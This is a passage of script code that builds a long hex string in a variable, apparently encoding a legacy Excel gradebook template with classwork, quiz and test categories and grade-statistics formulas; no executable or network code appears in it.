wD+="2a205c28232c2323305c293b5f282224222a20222d225f293b5f28405f291e042e002900290"
wD+="0005f282a20232c2323305f293b5f282a205c28232c2323305c293b5f282a20222d225f293b"
wD+="5f28405f291e043f002c003a00005f282224222a20232c2323302e30305f293b5f282224222"
wD+="a205c28232c2323302e30305c293b5f282224222a20222d223f3f5f293b5f28405f291e0436"
wD+="002b003100005f282a20232c2323302e30305f293b5f282a205c28232c2323302e30305c293"
wD+="b5f282a20222d223f3f5f293b5f28405f291e040b00a400060000302e303030301e040a00a5"
wD+="00050000302e3030301e040800a600030000302e30e000140000000000f5ff2000000000000"
wD+="00000000000c020e000140001000000f5ff200000f40000000000000000c020e00014000100"
wD+="0000f5ff200000f40000000000000000c020e000140002000000f5ff200000f400000000000"
wD+="00000c020e000140002000000f5ff200000f40000000000000000c020e000140000000000f5"
wD+="ff200000f40000000000000000c020e000140000000000f5ff200000f40000000000000000c"
wD+="020e000140000000000f5ff200000f40000000000000000c020e000140000000000f5ff2000"
wD+="00f40000000000000000c020e000140000000000f5ff200000f40000000000000000c020e00"
wD+="0140000000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400"
wD+="00000000000000c020e000140000000000f5ff200000f40000000000000000c020e00014000"
wD+="0000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400000000"
wD+="00000000c020e0001400000000000100200000000000000000000000c020e000140001002b0"
wD+="0f5ff200000f80000000000000000c020e000140001002900f5ff200000f800000000000000"
wD+="00c020e000140001002c00f5ff200000f80000000000000000c020e000140001002a00f5ff2"
wD+="00000f80000000000000000c020e000140007000000f4ff000000f40000000000000000c020"
wD+="e000140006000000f4ff000000f40000000000000000c020e000140001000900f5ff200000f"
wD+="80000000000000000c020e0001400000001000100200000040000000000000000c020e00014"
wD+="000000000001002000006011114020402000040d20e00014000000010001002000006411114"
wD+="020402000040d20e00014000000000001002000006011114020402000040f20e00014000000"
wD+="010001002000006411114020402000040f20e00014000f00000001002000006811114020402"
wD+="000041620e00014000f00010001002000006c11114020402000041620e00014000000000001"
wD+="00200000201111402040200000c020e00014000000000001002000006011114020402000041"
wD+="620e00014001400000001002000006811114020402000040a20e00014000f00000001002000"
wD+="00080000000000000000c0eeee001400130000000100200000080000000000000000c020e00"
wD+="01400000000000000200000e011114020402000040f20e0001400000000000000200000e011"
wD+="114020402000040d20e0001400000000000000200000800000000000000000c020e00014000"
wD+="00001000000200000840000000000000000c020e0001400140001000000200000ec11114020"
wD+="402000040a2093020400108003ff93020400118006ff93020400128004ff93020400138007f"
wD+="f93020400148009ff93020400158008ff93020400008000ff93020400168005ff6001020000"
wD+="0085000b00c710000000000300616c6c85000a003a22000000000200637785000a00893f000"
wD+="000000200687785000c0010580000000004007175697a85000c006764000000000400746573"
wD+="7485000c00ac6f00000000040073746174850011001e80000000000900646576696174696f6"
wD+="e8500110029830000000009006176672067726170688c00040001000100ae01040008000104"
wD+="170020000500000001000100000002000200000003000300000004000400000000000000180"
wD+="01b00210000010b000000010000000000000d3b040001001f000100010018001b0021000001"
wD+="0b000000020000000000000d3b000001001f000100010018001b00210000010b00000003000"
wD+="0000000000d3b010001001f000100010018001b00210000010b000000040000000000000d3b"
wD+="020001001f000100010018001b00210000010b000000050000000000000d3b030001001f000"
wD+="1000100c1010800c1010000548d0100eb0082000f0000f07a000000000006f040000000011c"
wD+="000007000000180000000600000002000000050000000300000004000000040000000300000"
wD+="00500000002000000010000000b000000060000000600000033000bf012000000bf00080008"
wD+="00810141000008c0014000000840001ef1100000000b0000080c00000817000008f7000010f"
wD+="c002f059d010000660000000400005441534b08000043415445474f52590500004752414445"
wD+="160000312f32392c20333020502e203439322c2050203530320d0000382e3620382e3720736"
wD+="86565741f0000312f3330205175697a2032206f6e20726174657320616e6420726174696f73"
wD+="130000312f333120322f312043682054657374204120120000322f312c3220702e203531362"
wD+="02d203531381400006368203720616e642037206e746220636865636b080000686f6d65776f"
wD+="726b090000636c617373776f726b0400007175697a0400007465737418000073696d696c617"
wD+="220747269616e676c6573207061636b65740900006368203820746573740f000070726f6a65"
wD+="6374206f75746c696e650c0000636f6f6c20646f776e20233511000070726f6772657373207"
wD+="3686565742023371000007765656b6c79207265766965772031351000007765656b6c792072"
wD+="6576696577203136110000547269676f6e6f6d657472792054657374140000322f362c20372"
wD+="0702e203739392023312d323520100000702e203533312035333820322f382c39170000392e"
wD+="3320392e34207079746861676f7265616e2074686d1000007765656b6c79207265766965772"
wD+="031340d000054726967205477697374657220130000322f32372c3238204d61746820412074"
wD+="657374150000332f312c3220776b7368742031302e312f31302e361000007765656b6c79207"
wD+="26576696577203137140000547269676f6e6f6d657472792050726f6a6563740c00006c6f63"
wD+="7573207061636b65740b0000436972636c65207175697a1f0000332f372c382031312e31206"
wD+="e6f74657320616e6420707261632041207368740d000050415254494349504154494f4e0d00"
wD+="0070617274696369706174696f6e0900007761726d75702023350d000050617274696369706"
wD+="174696f6e090000436c617373776f726b080000486f6d65776f726b0500005175697a200400"
wD+="00546573740d000046696e616c20617665726167650600006f7574206f66060000677261706"
wD+="820050000477261646508000053747564656e74731900004879706f746865746963616c2063"
wD+="6c617373206772616465730400006d65616e0700006d656469616e200400006d6f646506000"
wD+="06d656469616e08000057656967687465640800004176657261676573080000526567756c61"
wD+="722008000043617465676f72790400005175697a160000496e73657274207175697a2067726"
wD+="170682068657265160000496e73657274207465737420677261706820686572650500005465"
wD+="7374200d00003f20496e73657274206865726504000050757420050000796f7572200300006"
wD+="f662009000063617465676f7279200800006176657261676573050000686572652004000028"
wD+="6e6f74090000776569676874656420080000617665726167652908000063772067726164650"
wD+="a000046696e616c204176672e0400004d65616e08000056617269616e636508000053742e20"
wD+="4465762e0700005a2d53636f72650600004d656469616e03000056617205000053744465760"
wD+="600005a73636f72650300004d656405000074686973200500007061737465040000616c6c20"
wD+="060000677261646573040000686572650500006a757374200700006e756d626572730700006"
wD+="66967757265200400006f757420040000686f7720030000746f20040000736f727406000073"
wD+="742064657608000076617269616e63650700007a2d73636f726505000070616765200500007"
wD+="7696c6c20070000616e7377657220020000612007000070726f6a6563740c00007072657365"
wD+="6e746174696f6e0800007175657374696f6eff006a000800150b00000c000000a50b00009c0"
wD+="000001a0c000011010000bb0c0000b2010000530d00004a020000d00d0000c70200002f0e00"
wD+="00260300007c0e000073030000e70e0000de030000370f00002e0400007d0f000074040000c"
wD+="00f0000b704000001100000f804000063081500630800000000000000000000150000000002"
wD+="0000d20a0000000908100000061000e228cd07c9c00000060200000b0214000000000000000"
wD+="0002000000095110000021c00000d00020001000c00020064000f0002000100110002000000"
wD+="10000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000100800"
wD+="008000000000000000000250204000000ff0081000200c10414000000150000008300020000"
wD+="00840002000000a10022000000ff00010001000100040000000000000000000000e03f00000"
wD+="0000000e03f0000120002000100dd00020001006300020001005500020008007d000c000000"
wD+="0000db1f0f00020004007d000c0001000100b60d0f00020004007d000c000300030049030f0"
wD+="0020004007d000c0004000400b60d0f00060004009d000200010000020e0000000000200000"
wD+="0000000900000008021000000000000900ff000000000000010f0008021000010000000900f"
wD+="f000000000000010f0008021000020000000900ff000000000000010f000802100003000000"
wD+="0900ff000000000000010f0008021000040000000900ff000000000000010f0008021000050"
wD+="000000900ff000000000000010f0008021000060000000900ff000000000000010f00080210"
wD+="00070000000900ff000000000000010f0008021000080000000900ff000000000000010f000"
wD+="8021000090000000900ff000000000000010f00080210000a0000000900ff00000000000001"
wD+="0f00080210000b0000000900ff000000000000010f00080210000c0000000900ff000000000"
wD+="000010f00080210000d0000000900ff000000000000010f00080210000e0000000900ff0000"
wD+="00000000010f00080210000f0000000900ff000000000000010f0008021000100000000900f"
wD+="f000000000000010f0008021000110000000900ff000000000000010f000802100012000000"
wD+="0900ff000000000000010f0008021000130000000900ff000000000000010f0008021000140"
wD+="000000900ff000000000000010f0008021000150000000900ff000000000000010f00080210"
wD+="00160000000900ff000000000000010f0008021000170000000900ff000000000000010f000"
wD+="8021000180000000900ff000000000000010f0008021000190000000900ff00000000000001"
wD+="0f00080210001a0000000900ff000000000000010f00080210001b0000000900ff000000000"
wD+="000010f00080210001c0000000900ff000000000000010f00080210001d0000000900ff0000"
wD+="00000000010f00080210001e0000000900ff000000000000010f00080210001f0000000900f"
wD+="f000000000000010f00fd000a00000004001a0033000000fd000a00000005001a0034000000"
wD+="fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002000f0"
wD+="002000000fd000a00010004001a0024000000fd000a00010005001a0025000000fd000a0001"
wD+="0006001a0026000000fd000a00010007001a0027000000fd000a00010008001a0028000000f"
wD+="d000a00020000000f0021000000fd000a00020001000f00220000007e020a00020002000f00"
wD+="000059400600290002000400230000000000000024400000020007ff130024020002c042010"
wD+="5001f9a9999999999b93f05bd001200020005001b00000028401b0000003440060006003800"
wD+="020007001b000000000000002b400000020008ff220024050002c024090002c0240b0002c02"
wD+="41d0002c0420405001f9a9999999999c93f0506003d00020008001b006766666666662c4000"
wD+="00070004ff270024080002c0240a0002c024110002c0241a0002c0241b0002c0420505001f9"
wD+="a9999999999c93f05fd000a00030000000f0003000000fd000a00030001000f00090000007e"
wD+="020a00030002000f0000005940fd000a00040000000f0004000000fd000a00040001000f000"
wD+="a0000007e020a00040002000f0000005940fd000a00050000000f0005000000fd000a000500"
wD+="01000f000b0000007e020a00050002000f0000004940fd000a00060000000f0006000000fd0"
wD+="00a00060001000f00090000007e020a00060002000f0000c05040fd000a00060004001c0029"
wD+="000000fd000a00070000000f0007000000fd000a00070001000f00090000007e020a0007000"
wD+="2000f000000444006003300070004001d00cdcccccccc6c51400000580337fd1d0044020004"
wD+="c044020005c00344020006c00344020007c00344020008c003fd000a00080000000f0008000"
wD+="000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000"
wD+="0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0"
wD+="00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051"
wD+="40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000"
wD+="f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00"
wD+="0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000"
wD+="07e020a000d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f"
wD+="000a0000007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000"
wD+="f0001000f000a0000007e020a000f0002000f0000004940fd000a000f000400180035000000"
wD+="fd000a000f000500180036000000fd000a000f000600180034000000fd000a00100000000f0"
wD+="013000000fd000a00100001000f000a0000007e020a00100002000f0000003440fd000a0010"
wD+="000400180024000000fd000a0010000500180025000000fd000a0010000600180026000000f"
wD+="d000a0010000700180037000000fd000a0010000800180028000000fd000a00110000000f00"
wD+="14000000fd000a00110001000f000c0000007e020a00110002000f0000c0524006001f00110"
wD+="00400240000000000000059400000020004ff090024020002c042010500bd00120011000500"
wD+="190000004f40190000005140060006002e001100070019000000000000e050400000110004f"
wD+="f180024050002c024090002c0240b0002c0241d0002c0420405000600330011000800180000"
wD+="00000000c051400000110007fe1d0024080002c0240a0002c024110002c0241a0002c0241b0"
wD+="002c042050500fd000a00120000000f0015000000fd000a00120001000f00090000007e020a"
wD+="00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000"
wD+="0007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000100"
wD+="0f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0"
wD+="0150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190000"
wD+="00fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000000"
wD+="f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a00"
wD+="180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000000"
wD+="0fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000f"
wD+="0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a001"
wD+="a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000000"
wD+="7e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c0001000f0"
wD+="0090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a001d"
wD+="0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000f"
wD+="d000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000f00"
wD+="1e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d70044000f0"
wD+="a00006c021c007000ea002a002a002a00380061002a002a002a002a002a002a002a00540070"
wD+="00cc002a002a002a002a002a002a002a002a002a002a002a002a002a00c20118000e0007000"
wD+="6000904040000801100110001000907080007feec00aa000f0002f038030000100008f00800"
wD+="0000060000000a1400000f0003f0f80200000f0004f028000000010009f0100000000000000"
wD+="000000000000000000000000002000af00800000000140000050000000f0004f05200000092"
wD+="0c0af00800000001140000000a000043000bf0180000007f0004010401bf0008000800ff010"
wD+="0000800bf0300000200000010f0120000000100010000000100000002000000020000000000"
wD+="11f0000000005d0046001500120014000100012100000000dc089201000000000c001400000"
wD+="0000000000000000001000b000000100000001300ee1f00000b000400010300000200140057"
wD+="0000000000ec0078000f0004f078000000f2030af00800000004140000000a000093000bf03"
wD+="60000008000503236018500010000008b0002000000bf0008000a0047014f05000048012660"
wD+="0000810141000008c001400000087f0300000c00000010f0120000000000000077000200d30"
wD+="0000008030c00f100000011f0000000005d001a00150012001e000400116050323601a80992"
wD+="010000000000000000ec00080000000df000000000b60112001202000000000000000068001"
wD+="000000000003c00690000456e74657220796f7572206e6577207461736b7320686572652e20"
wD+="20596f75206d617920757365207468697320736865657420746f2068656c7020796f752e202"
wD+="04f70656e207468697320646f63756d656e7420616e64206368616e67652074686520696e66"
wD+="6f2e3c001000000000006c0211006800000000000000ec0078000f0004f078000000e2030af"
wD+="00800000005140000000a000093000bf0360000008000a03236018500010000008b00020000"
wD+="00bf0008000a00470155b5ffff480119d5ffff810141000008c001400000087f0300000c000"
wD+="00010f01200000000000600d001040088000800e00008000000000011f0000000005d001a00"
wD+="150012001e0005001160a0323601e40a92010000000000000000ec00080000000df00000000"
wD+="0b60112001202000000000000000029001000000000003c002a0000436c69636b2074686520"
wD+="63656c6c20616e6420636865636b206f75742074686520666f726d756c612e3c00100000000"
wD+="000e90011002900000000000000ec006c000f0004f06c000000c2000af00800000006140000"
wD+="000a000073000bf02a0000008000f03236018500010000008b0002000000bf0008000a00810"
wD+="10d000008bf0110001000c00140000008000010f012000000000004008b001300d3000800b0"
wD+="0120005a00000011f0000000005d001a00150012001e0006001160f0323601d80b920100000"
wD+="00000000000ec00080000000df000000000b6011200120200000000000000003e0010000000"
wD+="00003c003f0000496e7365727420746865206772617068206f6620746869732064617461206"
wD+="f6e2061206e65772073686565742e202053656520646972656374696f6e732e3c0010000000"
wD+="00005d0111003e00000000000000ec00fa000f0004f0f200000002000af0080000000a14000"
wD+="0000a0000b3000bf0b8000000bf000800080042011e01000043013a00000044010400000045"
wD+="c14c00000046c1240000007f0101000100810141000008bf0100001000c00140000008ff011"
wD+="000100013001300f0ff000000000c001a00180034002d003500420036006e000b007c000700"
wD+="8a0003007a001f0080001f0086001f008f0002009e000600ad000a00c6003a00db003a00f00"
wD+="03a0014010e001e0106000f0010000200004000ad012000ad012000ad012000ad012000ad01"
wD+="2000ad012000ac0080000010f012000000000004000b0012005a00080050031500c40000001"
wD+="1f0000000005d001a00150012001e000a00116000000000bc0c92010000000000000000ec00"
wD+="28002f0005f020000000000017f0080000000200000004140000000017f0080000000400000"
wD+="0051400003e021200b606000000004000000000000000000000001d000f0003020004000000"
wD+="0100020002000404ef00060005003700000067081700670800000000000000000000020001f"
wD+="fffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218000000"
wD+="000001000000290000000c230000cb2f00002f3000000d00020001000c00020064000f00020"
wD+="0010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00020000"
wD+="00820002000100800008000000000000000000250204000000ff0081000200c104140000001"
wD+="5000000830002000000840002000000a10022000000ff000100010001000400020001ff0000"
wD+="00000000e03f000000000000e03f0400120002000100dd00020001006300020001005500020"
wD+="008007d000c0000000000b6170f00020004007d000c0001000100920f0f00020004007d000c"
wD+="0008000800db0b0f00060004007d000c000d000d00b60a0f00060004009b0000009d0002000"
wD+="1009e00220000000400060218433601090100000000000000000000000000636c617373776f"
wD+="726b00020e00010000002900000000000e00000008021000010000000a00ff0000000000000"
wD+="10f0008021000020000000a00ff000000000020010f0008021000030000000a00ff00000000"
wD+="0020010f0008021000040000000a00ff000000000000010f0008021000050000000a00ff000"
wD+="000000020010f0008021000060000000a00ff000000000020010f0008021000070000000a00"
wD+="ff000000000020010f0008021000080000000a00ff000000000020010f00080210000900000"
wD+="00a00ff000000000020010f00080210000a0000000a00ff000000000020010f00080210000b"
wD+="0000000a00ff000000000020010f00080210000c0000000a00ff000000000020010f0008021"
wD+="0000d0000000a00ff000000000000010f00080210000e0000000a00ff000000000000010f00"
wD+="080210000f0000000a00ff000000000000010f0008021000100000000800ff0000000000000"
wD+="10f0008021000110000000800ff000000000020010f0008021000120000000800ff00000000"
wD+="0020010f0008021000130000000800ff000000000020010f0008021000140000000800ff000"
wD+="000000020010f0008021000150000000800ff000000000000010f0008021000160000000800"
wD+="ff000000000000010f0008021000170000000800ff000000000020010f00080210001800000"
wD+="00800ff000000000020010f0008021000190000000800ff000000000000010f00080210001a"
wD+="0000000800ff000000000020010f00080210001b0000000800ff000000000020010f0008021"
wD+="0001c0000000800ff000000000020010f00080210001d0000000800ff000000000020010f00"
wD+="080210001e0000000800ff000000000020010f00080210001f0000000800ff0000000000000"
wD+="10f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002"
wD+="000f0002000000fd000a00010003000f004b000000fd000a00010004000f0047000000fd000"
wD+="a00010005000f0048000000fd000a00010006000f0049000000fd000a00010007000f004a00"
wD+="0000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a000200010"
wD+="00f00220000007e020a00020002000f000000594003020e0002000800170014b742712b1451"
wD+="4003020e0002000900170014b742712b145140fd000a00030000000f0003000000fd000a000"
wD+="30001000f00090000007e020a00030002000f0000005940fd000a00030008000f0029000000"
wD+="fd000a00030009000f0029000000fd000a00040000000f0004000000fd000a00040001000f0"
wD+="00a0000007e020a0004000200250000004b40060047000400030025000000000000004b4020"
wD+="001f0007fe310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"
wD+="4160002c024190002c0241f0002c04209e300060047000400040026009ff4499ff4494c4020"
wD+="00040006ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"
wD+="4160002c024190002c0241f0002c04209050006004700040005002500f46ae259d16c954020"
wD+="000f0008ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"
wD+="4160002c024190002c0241f0002c042092e000600470004000600250055db59c2cf83424020"
wD+="00040007ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"
wD+="4160002c024190002c0241f0002c042090c000600280004000700250047c9462533d2b1bf20"
wD+="00040005ff120044040002c044040004c0041544040006c0067e020a0004000800170000805"
wD+="14001020600040009001700fd000a00050000000f0005000000fd000a00050001000f000b00"
wD+="00007e020a00050002000f0000004940fd000a00060000000f0006000000fd000a000600010"
wD+="00f00090000007e020a00060002000f0000c05040fd000a00070000000f0007000000fd000a"
wD+="00070001000f00090000007e020a00070002000f0000004440fd000a00080000000f0008000"
wD+="000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000"
wD+="0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0"
wD+="00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051"
wD+="40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000"
wD+="f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00"
wD+="0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000"
wD+="07e020a000d0002000f00000034407e020a000d0004000f0000004f4003020e000d0006000f"
wD+="0043e7357689da4340060028000d0007000f00410b953b80ecf0bf0000040004ff1200440d0"
wD+="002c0440d0004c00415440d0006c006fd000a000e0000000f0010000000fd000a000e000100"
wD+="0f000a0000007e020a000e0002000f00000049407e020a000e0004000f0000004f4003020e0"
wD+="00e0006000f0043e7357689da4340060028000e0007000f00937af3fa6d57d3bf00000d0007"
wD+="ff1200440e0002c0440e0004c00415440e0006c006fd000a000e0008001e0045000000fd000"
wD+="a000e0009001e002a000000fd000a000f0000000f0012000000fd000a000f0001000f000a00"
wD+="00007e020a000f0002000f000198c2407e020a000f0004000f0000004f4003020e000f00060"
wD+="00f0043e7357689da4340060028000f0007000f00f7cfd0457ac1ea3f00000e0007ff120044"
wD+="0f0002c0440f0004c00415440f0006c006060023000f0008001b00cdcccccccccc284000003"
wD+="00637fd0d001fd7a3703d0ad7e33f1e1400057e020a000f0009001f0000003440fd000a0010"
wD+="0000000f0013000000fd000a00100001000f000a0000007e020a00100002000f00000034407"
wD+="e020a00100004000f0000004f4003020e00100006000f0043e7357689da4340060028001000"
wD+="07000f00410b953b80ecf0bf00000f0007ff120044100002c044100004c0041544100006c00"
wD+="6fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a00110002000f"
wD+="0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e020a001"
wD+="20002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000000"
wD+="7e020a00130002000f0000000000fd000a00140000000f0017000000fd000a00140001000f0"
wD+="0090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0015"
wD+="0001000f000a0000007e020a00150002000f00000059407e020a00150004000f0000004f400"
wD+="3020e00150006000f0043e7357689da434006002800150007000f0014820178c39fee3f0000"
wD+="100007ff120044150002c044150004c0041544150006c006fd000a00160000000f001900000"
wD+="0fd000a00160001000f000a0000007e020a00160002000f00000054407e020a00160004000f"
wD+="0000004f4003020e00160006000f0043e7357689da434006002800160007000f00dd376df82"
wD+="403dd3f0000150007ff120044160002c044160004c0041544160006c006fd000a0017000000"
wD+="0f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a0"
wD+="0180000000f001b000000fd000a00180001000f00090000007e020a00180002000f00000000"
wD+="00fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000"
wD+="f00000000007e020a00190004000f0000004f4003020e00190006000f0043e7357689da4340"
wD+="06002800190007000f00537e7ab998fbf8bf0000160007ff120044190002c044190004c0041"
wD+="544190006c006fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a"
wD+="001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000"
wD+="0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100"
wD+="0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0"
wD+="01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000"
wD+="00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000"
wD+="f001e000000fd000a001f0001000f000a0000007e020a001f0002000f00008056407e020a00"
wD+="1f0004000f0000004f4003020e001f0006000f0043e7357689da4340060028001f0007000f0"
wD+="0010f1cfaaa90e63f0000190007ff1200441f0002c0441f0004c00415441f0006c006d70042"
wD+="00370c000058027e004e0046009a012a002a002a002a002a002a002a002a0076009200ab007"
wD+="6002a002a002a002a00760076002a002a0076002a002a002a002a002a000802100028000d00"
wD+="0e00ff000000000000010f000102060028000d001700d70006001e0000000000c20118001f0"
wD+="00400020009070300010f08000f0005000903080007ffec00aa000f0002f03e020000200008"
wD+="f00800000005000000040400000f0003f00e0200000f0004f028000000010009f0100000000"
wD+="000000000000000000000000000000002000af00800000000040000050000000f0004f05200"
wD+="0000920c0af00800000001040000000a000043000bf0180000007f0004010401bf000800080"
wD+="0ff0100000800bf0300000200000010f0120000000100010000000100000002000000020000"
wD+="00000011f0000000005d00460015001200140001000121000000006c129201000000000c001"
wD+="40000000000000000000000010008000000100000001300ee1f000008000400010300000a00"
wD+="1400570000000000ec0072000f0004f06a000000920c0af00800000002040000000a0000830"
wD+="00bf0300000007f0004010401bf000800080081014e00000883014d000008bf0110001000c0"
wD+="014d000008ff01080008003f0200000200000010f012000000000000004101210000000c00a"
wD+="0023700d300000011f0000000005d001a001500120005000200116000000000381392010000"
wD+="0000000000000908100000062000e228cd07c9c000000602000014000000150000008300020"
wD+="000008400020000004d006a0300004500700073006f006e0020005300740079006c00750073"
wD+="00200043004f004c004f005200200036003000300020004500530043002f005000200032000"
wD+="000000001040005dc008c0243ef800702000100ea0a6f08640001000f006801020001006801"
wD+="020001004c00650074007400650072000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000100000000000000020000000200000001000000300100000000000000000"
wD+="000000000000000000044494e55220000003402580053ab1e3f000000000000000000000000"
wD+="010000000000000000000000000000000800000001000000010000000000020000000400000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000dddd00000000000000000000000000000000000000000000000000000"
wD+="0000000000000000000000580000004f5350454141828202000000000000000100000000000"
wD+="000000000000000000000000000010000000000000004000000000000000000000000000000"
wD+="000000006a0000000000000003000000010000000f000000a10022000100640001000100010"
wD+="0000068016801000000000000e03f000000000000e03f010033000200030060100a00802535"
wD+="16dc000100090060100a008115e60ac80000000a0060100a008115e60ac80001000b0012000"
wD+="2000100011002000000021010000000000000000000d0bfb502e8bf230133100000a0000400"
wD+="0100010064100800000001000000010032100400000002003310000007100c0000000000000"
wD+="0ffff09004d000a101000ffffff0000000000010001004e004d003410000003100c00030001"
wD+="000c000900010000003310000051100f0000020000000007003a0000010002000d100e00000"
wD+="0050147005200410044004500511013000102000000000b003b000002001f00020002005110"
wD+="13000202000000000b003b000002001f000000010051100800030100000000000006100800f"
wD+="fff000000000000331000005f10020000003410000045100200000034100000441004000a00"
wD+="0000241002000200251020000202010000000000eaffffffcbffffff0000000000000000b10"
wD+="04d00103d0000331000004f1014000200020000000000000000000000000000000000261002"
wD+="000a0051100800000100000000000034100000241002000300251020000202010000000000e"
wD+="affffffcbffffff0000000000000000b1004d00103d0000331000004f101400020002000000"
wD+="0000000000000000000000000000261002000b0051100800000100000000000034100000461"
wD+="00200010041101200000062010000e0030000820b000005060000331000004f101400020002"
wD+="002c000000ed020000b90c0000490c00001d101200000000000000000000000000000000000"
wD+="000331000002010080001aaaaaa010001006210120000000000010000000100000000000000"
wD+="ef001e101e000200030100000000000000000000000000000000000000000b004d005a00261"
wD+="002000900341000001d101200010000000000000000000000000000000000331000001f102a"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="00000001f011e101e0002000301000000000000000000000000000000000000000023004d00"
wD+="000021100200010007100c00000000000000ffff09004d00341000003510000032100400000"
wD+="003003310000007100c008080800000000000000017000a101000c0c0c00000000000010000"
wD+="0016004f0034100000141014000000000000000000000000000000000000000000331000001"
wD+="8100200010022100a0000000000000000000f0015101400150d00001a0600007a0200009101"
wD+="000003011f00331000004f10140005000200150d00001a06000000000000000000002510200"
wD+="00202010000000000eaffffffcbffffff0000000000000000b1004d0030090000331000004f"
wD+="101400020002000000000000000000000000000000000051100800000100000000000034100"
wD+="000341000003410000034100000251020000202010000000000a9060000540000004a020000"
wD+="e501000081004d0080300000331000004f101400020002000000000000000000860000002e0"
wD+="00000261002000a005110080000010000000000000d10180000000a0143006c006100730073"
wD+="0077006f0072006b00200027100600010000000000341000003410000000020e00000000000"
wD+="90000000000010000006510020002000402370000000000000017000163006c006100730073"
wD+="0077006f0072006b000a0038002e003600200038002e0037002000730068006500650074000"
wD+="4022f0001000000000013000163006c0061007300730077006f0072006b000a007700610072"
wD+="006d00750070002000230035000402350002000000000016000163006c00610073007300770"
wD+="06f0072006b000a0063006f006f006c00200064006f0077006e0020002300350004023d0003"
wD+="00000000001a000163006c0061007300730077006f0072006b000a007700650065006b006c0"
wD+="07900200072006500760069006500770020003100350004023d000400000000001a00016300"
wD+="6c0061007300730077006f0072006b000a007700650065006b006c007900200072006500760"
wD+="069006500770020003100360004023d000500000000001a000163006c006100730073007700"
wD+="6f0072006b000a007700650065006b006c00790020007200650076006900650077002000310"
wD+="034000402370006000000000017000163006c0061007300730077006f0072006b000a005400"
wD+="72006900670020005400770069007300740065007200200004023d000700000000001a00016"
wD+="3006c0061007300730077006f0072006b000a007700650065006b006c007900200072006500"
wD+="76006900650077002000310037000402350008000000000016000163006c006100730073007"
wD+="7006f0072006b000a006c006f0063007500730020007000610063006b006500740065100200"
wD+="010003020e000000000000000000000000004b4003020e00010000000000000000000000344"
wD+="003020e00020000000000000000000000494003020e00030000000000cdcccccccccc574003"
wD+="020e00040000000000000000000000344003020e00050000000000000000000000594003020"
wD+="e00060000000000000000000000544003020e00070000000000000000000000000003020e00"
wD+="08000000000000000000008056406510020003000a000000ec0066000f0004f066000000a20"
wD+="c0af00800000003040000000a000063000bf0240000008000784a36018b0002000000bf0008"
